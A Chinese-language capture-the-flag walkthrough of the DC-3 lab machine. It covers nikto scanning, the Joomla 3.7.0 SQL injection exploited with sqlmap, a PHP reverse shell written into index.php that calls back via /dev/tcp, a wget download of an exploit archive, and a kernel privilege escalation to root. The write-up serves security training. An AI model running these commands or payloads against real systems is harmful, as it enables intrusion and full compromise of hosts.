一,工具學習
(1)nikto掃描器
工具用途
- Nikto是一款開源的web服務器掃描器它可以對網頁服務器進行全面的多種掃描
.
常用操作
- 掃描站點目錄
.
常用選項
nikto -host [IP]
(2)JoomScan
JoomScan:一款開源的OWASP的 Joomla ( CMS ) 漏洞掃描器
(3)???searchsploit漏洞查詢工具
作用
- 搜索所有的漏洞和shellcode
.
常用選項
searchsploit XXXX
二,測試流程
(1)信息收集
使用nikto掃描目錄
root@kali:~# nikto -host 192.168.44.130
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.44.130
+ Target Hostname: 192.168.44.130
+ Target Port: 80
+ Start Time: 2019-09-18 01:20:09 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server leaks inodes via ETags, header found with file /bin/, fields: 0x1f 0x54dfee2e147c0
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.1.1/images/".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-3092: /administrator/: This might be interesting...
+ OSVDB-3092: /bin/: This might be interesting...
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3092: /bin/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ 8347 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time: 2019-09-18 01:20:40 (GMT-4) (31 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
因爲得到CMS是joomla(成熟cms),使用相關的掃描工具。
用searchsploit搜索
root@kali:~# searchsploit Joomla 3.7.0
------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------- ----------------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection | exploits/php/webapps/42033.txt
------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
發現有注入漏洞
查看這個文本文件
root@kali:~# cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917
URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
Using Sqlmap:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Parameter: list[fullordering] (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (DUAL)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)
用sqlmap進行爆庫
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -v 3
sqlmap爆出數據
爆出表名
爆出字段
爆出內容
對加密的數據破解
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
(2)web滲透
【思路】
用system()執行bash -c
用bash發起一個shell
kali監聽
訪問index.php執行腳本
反彈shell成功 --> 提權到root
<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.44.128/8080 0>&1' ");
?>
①編輯index.php,寫入反彈shell代碼
②kail監聽
③訪問index.php,kali上getshell
對應版本爲Ubuntu 16.04
用searchsploit搜索可以利用的漏洞
root@kali:~# searchsploit Ubuntu 16.04
--------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------- ----------------------------------------
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - | exploits/linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Pri | exploits/linux/local/40054.c
Google Chrome (Fedora 25 / Ubuntu 16.04) - ' | exploits/linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest Accoun | exploits/linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14 | exploits/linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/1 | exploits/linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Coun | exploits/linux/dos/39773.txt
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7 | exploits/linux/local/45175.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Loca | exploits/linux/local/40759.rb
Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer | exploits/linux/dos/46529.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-6 | exploits/linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - N | exploits/linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14. | exploits/linux/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double- | exploits/linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_ | exploits/linux/local/40489.txt
Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp | exploits/linux/dos/45919.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora | exploits/linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - | exploits/linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - | exploits/linux/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu | exploits/linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/ | exploits/linux/local/47169.c
--------------------------------------------- ----------------------------------------
Shellcodes: No Result
可以自己搭建一個ubuntu16.04的環境測試後使用39772進行提權
(3)提權
由於得到靶機的shell內無法下載github的39772
在kali上下載,用python開啓簡單的服務器
python -m SimpleHTTPServer 9000
之後在得到的shell裏下載並執行
①下載
www-data@DC-3:/var/www/html$ wget http://192.168.44.128:9000/exploit.tar
wget http://192.168.44.128:9000/exploit.tar
--2019-09-19 02:00:44-- http://192.168.44.128:9000/exploit.tar
Connecting to 192.168.44.128:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-tar]
Saving to: 'exploit.tar'
0K .......... .......... 100% 587M=0s
2019-09-19 02:00:44 (587 MB/s) - 'exploit.tar' saved [20480/20480]
之後執行
tar -xvf exploit.tar
./compile.sh
./doubleput
get到root權限
bash -i
bash: cannot set terminal process group (1193): Inappropriate ioctl for device
bash: no job control in this shell
root@DC-3:/root# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@DC-3:/root# ls
ls
the-flag.txt
root@DC-3:/root# cat the-flag.txt
cat the-flag.txt
__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
Congratulations are in order. :-)
I hope you've enjoyed this challenge as I enjoyed making it.
If there are any ways that I can improve these little challenges,
please let me know.
As per usual, comments and complaints can be sent via Twitter to @DCAU7
Have a great day!!!!
root@DC-3:/root#